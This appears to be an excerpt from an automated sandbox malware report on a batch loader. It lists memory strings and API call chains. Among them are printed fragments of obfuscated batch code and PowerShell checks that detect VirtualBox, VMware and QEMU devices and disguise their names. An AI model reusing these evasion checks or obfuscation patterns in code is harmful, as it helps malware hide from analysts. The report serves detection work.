Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000030.00000002.2751057770.000001E2E4240000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: cmd.exe, 0000000F.00000003.1568558191.000001C115A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uHUjjkekJpvcFFqLoRiQSkaxsTUOnjrSDyIepQs%c%tdngkwqWHYWxoEuakGwRpppWAYDzgXlvxzPNFdPbbWnQrMcniyyyTYceOqGmSRPKMAZPPGugQvPtbz%b%FNWpqHzNCzwLZoxDijgDdQMmyBerIxiIcoLSqDBhkZYzsdHgJmmGmywObJQODhfeqNIKCEnFIYseSm%w%TuUYIvlCwDSWRGMNEcTTjEuXDeZHXngsWOPwUFzKTNrfSGNGSUupkYdoZWuEvDFiwAadQqTYDjZwnp%=$%WrsOcSQhXKBwXkUopiiIsFJPCbwLbZGbKSymcOCqGscspUVNIUKo%n%fGMrHCmbwegYeALfMHlAGScaDrAIfJdgosVdfgFzCATBleoPiQaa%u%JjHmEMOqcEVMbaJLEIZFcLYfYBOzcLzoJcwfKJzsspxXFhzkuDkA%l%RuYXkCocXpnreGcZEEaUiGnNnbAQbEezAZxpeyViuwvdbgSYeAGQ%l%DqrkhlJicxbtkOQfiNVfIRAMljLhiBMBXoWkIniSOMgXvbTnpNQr%,%FBhLQEYXACZALzwWRGwVFcqWLCrkpxRvLuWwgkudoksmMFlVFXwJ% %qVLCklannOIcLEPqDZPGltGvJekfqvFsbhfQJtlVkgPABpBiPVrF%$%hPxXoqTgbUWSjqbDzZHkOUveDfTtDbpvdZklJhBszfUqkXrlnXJQ%w%ngRntstjxzCZEBOjfQTrypKIafUGOHgFszhXiWRqOrUaDULJiigx%j%errYvinnyNvQtWGftRaiYCDguKffulxGAIBahjBaJESaWeHGoGpr%U%hXyBOlELdiTmqOpKvFXkpazuJCjpdzROVfyDjamWFPWAKFKhPXlI%z%IfbhxeRmboIEqfrkqLAutbFAdYJeSbAgoifPdqffiZUqhsjEozRd%C%wQoHABdyuNuZNCqiaBgZFultgosKOfPskwJxUxpCmGLvFUCEcbEM%)%tRxbEUBmitJpXcPqSSnClEMYJQOlLOINAdYtZHTZWdtTXvyDflLk%"
Source: svchost.exe, 0000001B.00000002.2867817753.000002A76AFCA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 9-4vmci
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: svchost.exe, 00000014.00000000.1582643174.000002234AE79000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: lsass.exe, 00000009.00000002.2757363580.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498242259.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2741546577.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1502576174.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1584093609.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2740015718.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1588412072.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2761571888.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2738255180.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1597118724.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1615958373.000002A769A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000030.00000002.2752494125.000001E2E425A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000F.00000003.1542431098.000001C115A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03A11000.00000004.00000001.00020000.00000000.sdmp, Hydra.ccLoader.bat, $rbx-CO2.bat.10.drBinary or memory string: !JGaWOdDLMowfHKNJdZbnHtCEuAkQgMwgPxbwNrwRXwwCNVeIJXpRrsnqewBoTMEZRppkJrVLCjqkWZRywBhixFPxkLrrPiXlRxKyFTZsbEohccteFdSsEwCmASZYZEVume! "Y%mIUgzLkqeGMYBJSNppqqwONOfzpCKVuyIcLmKVlUlXwJKYwEVnWNLgAyVgbZvIFimnpzXGcteveysd%Y%dgcLGxZHNCCnrEUlyDsnxxIXGpkCJpcbgRcUWKbhjEANXKpyzSXBfeGFyffrmwXxAAgzBZoOBleSXU%V%ZWZMcQsAVclxwRFKUMHcnwDQWzEiZUaOHDgjrAuheZFeneDxjRqrlVHDsjQCmjBabxPTKvsuszXoQz%F%CRWgZiEJCMVCQiJRUUxFcQoKMNzVYLXsMTHYGfktwsUcXiFjKBEdQlwLDlumIIKRPDQXBLkOKeiKWm%c%MEiplxgUBAwVvuLYKOIdnusHIZrPsMdLPrzPdtwnKVbpBFqPdMuucSYsmAGmfrBPxKgeVWUrrutrsc%K%gdIBMGsIJWsgDDMkhttmRQzlTgRddHzGajuDDDEVxPbjMPsrEgnZYflpExIFOpEbxLfuiiHDPyPcPq%G%zeOAyXuzIUXeZgVYgikZLaJYivzJkzqjAoXDRnQHHYclwdjBIQsHRQEyvPrcyLojEOELisgSrCrNYy%w%CfmXbthIrKJzicWOjWJTGHyytqKzppyQAXnmQAKUbWxTbJjeWDsvefRUGNELJHsbmTZlOKYJmORKjF%n%xJgGDMWdMufsFcVYluDvHiKYpmFJjpnhLbqUEdeFejgEfveVNnDxgNXoZhqqhnTxhXHDLbuhpXqybg%A%SThJVVLQbXebUxMOyRpJwiOAjMTviiwynTowiysXLqWKzKgXvAzzjsJKfGzicqISAFOaipFayrYgmd%p%bzGVaHJXpUkErBYjUuIdkUWfPfVzbRuCxcFaChqbiDqTQDYdbpwDxiTgDAgULkVxAHgoVXGNeGUGEc%x%plgRxLvQeoiyxcavpYHTsiwJhdIIzRnmCAlUOUNkbKCRgwAENIrWZKKgPwJtdMqnbWWWQfHvlxRIFE%X%DKDdVQzrmRQefrktgptoQkAEOHbVLCTbAkTYQaQAOJJefLZqlRrBorNtjZooPEFKYOEVxlDfzTAhBw%X%ycHKKTlsNjwAORLCKjdYgrhdSZolcvQGSNAmGeULzFbuzXwMtWirdCqgVDSKFZprtPIbqzVFpszApN%n%EUDBSfnzDpwuqcmjfzqJaKpuwTbCbKdQRiZXgehjeUlsEWjTtfmZkFMUEifYeKxSmGCidodbsgFgyX%O%QAKhiVydGlwftYYiftxsfXtaQfckHdaFvHsEoWBBujarMXVecjblJfRShJrdTnvClQJLGuUiRVYWXc%b%nSjXiycOWqQzxEFyIgNxfWojyIoTtOhUUfvzUVfXAxTtVgWqDtmSjzWrDZyzjiuijVEsifDMaQXIcV%l%osMYqaBoLvieVUxFNrcLkaBDhxPARtCnpILgNkSuHUjjkekJpvcFFqLoRiQSkaxsTUOnjrSDyIepQs%c%tdngkwqWHYWxoEuakGwRpppWAYDzgXlvxzPNFdPbbWnQrMcniyyyTYceOqGmSRPKMAZPPGugQvPtbz%b%FNWpqHzNCzwLZoxDijgDdQMmyBerIxiIcoLSqDBhkZYzsdHgJmmGmywObJQODhfeqNIKCEnFIYseSm%w%TuUYIvlCwDSWRGMNEcTTjEuXDeZHXngsWOPwUFzKTNrfSGNGSUupkYdoZWuEvDFiwAadQqTYDjZwnp%=$%WrsOcSQhXKBwXkUopiiIsFJPCbwLbZGbKSymcOCqGscspUVNIUKo%n%fGMrHCmbwegYeALfMHlAGScaDrAIfJdgosVdfgFzCATBleoPiQaa%u%JjHmEMOqcEVMbaJLEIZFcLYfYBOzcLzoJcwfKJzsspxXFhzkuDkA%l%RuYXkCocXpnreGcZEEaUiGnNnbAQbEezAZxpeyViuwvdbgSYeAGQ%l%DqrkhlJicxbtkOQfiNVfIRAMljLhiBMBXoWkIniSOMgXvbTnpNQr%,%FBhLQEYXACZALzwWRGwVFcqWLCrkpxRvLuWwgkudoksmMFlVFXwJ% %qVLCklannOIcLEPqDZPGltGvJekfqvFsbhfQJtlVkgPABpBiPVrF%$%hPxXoqTgbUWSjqbDzZHkOUveDfTtDbpvdZklJhBszfUqkXrlnXJQ%w%ngRntstjxzCZEBOjfQTrypKIafUGOHgFszhXiWRqOrUaDULJiigx%j%errYvinnyNvQtWGftRaiYCDguKffulxGAIBahjBaJESaWeHGoGpr%U%hXyBOlELdiTmqOpKvFXkpazuJCjpdzROVfyDjamWFPWAKFKhPXlI%z%IfbhxeRmboIEqfrkqLAutbFAdYJeSbAgoifPdqffiZUqhsjEozRd%C%wQoHABdyuNuZNCqiaBgZFultgosKOfPskwJxUxpCmGLvFUCEcbEM%)%tRxbEUBmitJpXcPqSSnClEMYJQOlLOINAdYtZHTZWdtTXvyDflLk%"
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000021.00000000.1658255735.000002517802B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 00000026.00000000.1684153826.00000297A5600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 0000000C.00000000.1502576174.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: spoolsv.exe, 00000031.00000002.2729852206.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000031.00000000.1757295956.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll||
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-616
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-702
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,8_2_000001CA7D1E1E3C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,7_2_0000000140001CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001CA7D218814
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D2984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D2984B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001CA7D29CD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D298814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001CA7D298814
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0000017D2DD58814
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD8CD80
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD884B0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD88814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0000017D2DD88814
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000022F4B9284B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00000262F1C98814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1C9CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1C984B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1D084B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DF8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00000262F1DF8814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1DFCD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DF84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1DF84B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001C115C7CD80
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001C115C784B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001C115C78814
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001C115CACD80
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001C115CA84B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001C115CA8814
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497F8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000001BB497F8814
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BB497FCD80
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497F84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BB497F84B0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000023942B18814
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E138814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002234E138814
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E1384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002234E1384B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002234E13CD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E168814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002234E168814
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E1684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002234E1684B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002234E16CD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001EF05708814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001EF057084B0
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000002287AD78814
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002287AD784B0
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002287AD7CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001B94DA98814
